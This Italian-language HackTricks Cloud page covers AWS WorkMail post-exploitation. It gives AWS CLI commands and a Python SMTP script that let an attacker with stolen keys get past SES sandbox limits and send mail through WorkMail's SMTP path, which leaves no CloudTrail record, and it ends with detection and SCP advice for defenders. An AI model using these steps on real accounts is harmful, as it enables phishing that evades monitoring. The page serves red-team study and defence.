HackTricks CloudAWS - WorkMail Post Exploitation
Tip
Impara & pratica AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Impara & pratica GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Impara & pratica Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Sostieni HackTricks
- Controlla i subscription plans!
- Unisciti al đŹ Discord group o al telegram group o seguici su Twitter đŚ @hacktricks_live.
- Condividi hacking tricks inviando PRs ai HackTricks e HackTricks Cloud github repos.
Abusing WorkMail to bypass SES sandbox
Anche se SES è bloccato nella sandbox (solo destinatari verificati, ~200 msgs/24h, 1 msg/s), WorkMail non ha una restrizione equivalente. An attacker con chiavi a lungo termine può istanziare unâinfrastruttura mail usa-e-getta e iniziare a inviare immediatamente:
- Create a WorkMail org (region-scoped)
aws workmail create-organization --region us-east-1 --alias temp-mail --directory-id <dir-id-if-reusing>
- Verify attacker-controlled domains (WorkMail invokes SES APIs as
workmail.amazonaws.com):
aws ses verify-domain-identity --domain attacker-domain.com
aws ses verify-domain-dkim --domain attacker-domain.com
- Provision mailbox users and register them:
aws workmail create-user --organization-id <org-id> --name marketing --display-name "Marketing"
aws workmail register-to-work-mail --organization-id <org-id> --entity-id <user-id> --email marketing@attacker-domain.com
Notes:
- Default recipient cap documented by AWS: 100,000 external recipients/day per org (aggregated across users).
- Domain verification activity will appear in CloudTrail under SES but with
invokedBy:workmail.<region>.amazonaws.com, so SES verification events can belong to WorkMail setup rather than SES campaigns. - WorkMail mailbox users become application-layer persistence independent from IAM users.
Sending paths & telemetry gaps
Web client (WorkMail UI)
- Appaiono come eventi
ses:SendRawEmailin CloudTrail. userIdentity.type=AWSService,invokedBy/sourceIPAddress/userAgent=workmail.<region>.amazonaws.com, quindi il vero IP client è nascosto.requestParameterscontinuano a leak il sender (source,fromArn,sourceArn, configuration set) per correlare con domini/mailbox appena verificati.
SMTP (stealthiest)
- Endpoint:
smtp.mail.<region>.awsapps.com:465(SMTP over SSL) using the mailbox password. - No CloudTrail data events are generated for SMTP delivery, even when SES data events are enabled.
- Ideal detection points are org/domain/user provisioning and SES identity ARNs referenced in subsequent web-sent
SendRawEmailevents.
Esempio di invio SMTP tramite WorkMail
```python import smtplib from email.message import EmailMessageSMTP_SERVER = âsmtp.mail.us-east-1.awsapps.comâ SMTP_PORT = 465 EMAIL_ADDRESS = âmarketing@attacker-domain.comâ EMAIL_PASSWORD = âSuperSecretPassword!â
target = âvictim@example.comâ # can be unverified/external msg = EmailMessage() msg[âSubjectâ] = âWorkMail SMTPâ msg[âFromâ] = EMAIL_ADDRESS msg[âToâ] = target msg.set_content(âDelivered via WorkMail SMTPâ)
with smtplib.SMTP_SSL(SMTP_SERVER, SMTP_PORT) as smtp: smtp.login(EMAIL_ADDRESS, EMAIL_PASSWORD) smtp.send_message(msg)
</details>
## Considerazioni per il rilevamento
- Se WorkMail non è necessario, bloccarlo tramite **SCPs** (`workmail:*` deny) a livello dell'organizzazione.
- Allertare sul provisioning: `workmail:CreateOrganization`, `workmail:CreateUser`, `workmail:RegisterToWorkMail`, e verifiche SES con `invokedBy=workmail.amazonaws.com` (`ses:VerifyDomainIdentity`, `ses:VerifyDomainDkim`).
- Monitorare eventi anomali **`ses:SendRawEmail`** in cui gli ARN di identity fanno riferimento a nuovi domini e l'IP/UA sorgente è `workmail.<region>.amazonaws.com`.
## References
- [Threat Actors Using AWS WorkMail in Phishing Campaigns](https://www.rapid7.com/blog/post/dr-threat-actors-aws-workmail-phishing-campaigns)
- [AWS WorkMail limits](https://docs.aws.amazon.com/workmail/latest/adminguide/limits.html)
> [!TIP]
> Impara & pratica AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://hacktricks-training.com/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Impara & pratica GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://hacktricks-training.com/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Impara & pratica Az Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://hacktricks-training.com/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Sostieni HackTricks</summary>
>
> - Controlla i [**subscription plans**](https://github.com/sponsors/carlospolop)!
> - **Unisciti al** đŹ [**Discord group**](https://discord.gg/hRep4RUj7f) o al [**telegram group**](https://t.me/peass) o **seguici** su **Twitter** đŚ [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Condividi hacking tricks inviando PRs ai** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
>
> </details>